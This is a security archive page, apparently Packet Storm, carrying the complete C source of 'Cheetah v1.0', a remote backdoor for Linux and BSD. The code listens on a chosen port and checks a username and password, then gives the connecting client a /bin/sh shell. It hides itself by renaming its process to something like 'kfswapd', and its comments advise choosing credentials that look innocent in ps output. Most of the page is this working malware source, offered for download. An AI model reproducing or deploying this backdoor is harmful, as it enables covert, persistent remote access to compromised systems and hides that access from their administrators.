what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

cheetah.c

cheetah.c
Posted Aug 26, 2004
Authored by Tal0n

Cheetah version 1.0 is a remote Linux/BSD backdoor that offer low CPU usage, Port/Backlog selection, a remote shell, user/password protection, and process faking.

tags | tool, remote, shell, rootkit
systems | linux, unix, bsd
SHA-256 | 14494a026dcba9f3ddc81a36464f7285e7aa4ab559ded6f69da75edda6346e4a

cheetah.c

Change Mirror Download
// -------------------------------------------------------------
// Cheetah v1.0 - Remote Linux/BSD Backdoor
// -------------------------------------------------------------
// Features:
// Low-CPU
// Port/Backlog Selection
// Remote Shell
// User/Password Protection
// Process Faking
// -------------------------------------------------------------
// Usage: ./cheetah <user> <password> <port> <backlog> <process>
// -------------------------------------------------------------
// Note: The process faking is a bit buggy with arguments, so try
// to use common words for the user/pass so it won't look very
// suspicous to the person viewing 'ps -aux' ;)
// --------------------------------------------------------------
// By: Tal0n 03-30-04
// -------------------------------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SHELL "/bin/sh"

int main(int argc, char *argv[])

{

int lsock, rsock;
struct sockaddr_in server;
struct sockaddr_in client;

char inuser[BUFSIZ];
char inpass[BUFSIZ];

char *username;
username = argv[1];

char *password;
password = argv[2];

char *process;
process = argv[5];

char *banner = "\nCheetah v1.0, by Tal0n 03-30-04\n";

if(argc != 6)

{
printf("%s", banner);
printf("\nUsage: %s <user> <password> <port> <backlog> <process>",
argv[0]);
printf("\nExample: %s bob d1rtyh4rry 9000 20 kfswapd\n\n", argv[0]);
return 0;
}

if(argc == 6)

{
printf("%s", banner);

if((lsock = socket(AF_INET, SOCK_STREAM, 0)) < 0)

{
printf("\n\nError: Can't create socket!\n\n");
return -1;
}

server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[3]));
server.sin_addr.s_addr = INADDR_ANY;

strcpy(argv[0], process);
signal(SIGCHLD, SIG_IGN);

if(bind(lsock, (struct sockaddr *)&server, sizeof(struct sockaddr)) < 0)

{
printf("\n\nError: Can't bind on port %s!\n\n", argv[3]);
return -1;
}

if(listen(lsock, argv[4]) < 0)

{
printf("\n\nError: Can't listen on port %s!\n\n", argv[3]);
return -1;
}

printf("\nInformation:");
printf("\n\t\tUsername: %s", username);
printf("\n\t\tPassword: %s", password);
printf("\n\t\tPort: %s", argv[3]);
printf("\n\t\tBacklog: %s", argv[4]);
printf("\n\t\tProcess: %s\n\n", process);

while(1)

{

int size;
size = sizeof(struct sockaddr);
rsock = accept(lsock, (struct sockaddr *)&client, &size);

dup2(rsock, 0);
dup2(rsock, 1);
dup2(rsock, 2);

printf("%s", banner);

printf("\nUser: ");
scanf("%s", &inuser);

printf("\nPassword: ");
scanf("%s", &inpass);

if((strcmp(username, inuser) != 0) || (strcmp(password, inpass) != 0))
{
printf("\nLogin Incorrect. Goodbye!\n\n");
close(rsock);
return 0;
}

if((strcmp(username, inuser) == 0) && (strcmp(password, inpass) == 0))
{
printf("\n\nLogin Correct. Entering Shell...\n\n");

execl(SHELL, SHELL, (char *)0);

close(rsock);
}

}

return 0;
}
}

Cheetah is a Linux/BSD Backdoor with user/pass authenciation and some nice
features.

_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*.
http://join.msn.com/?page=features/featuredemail
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close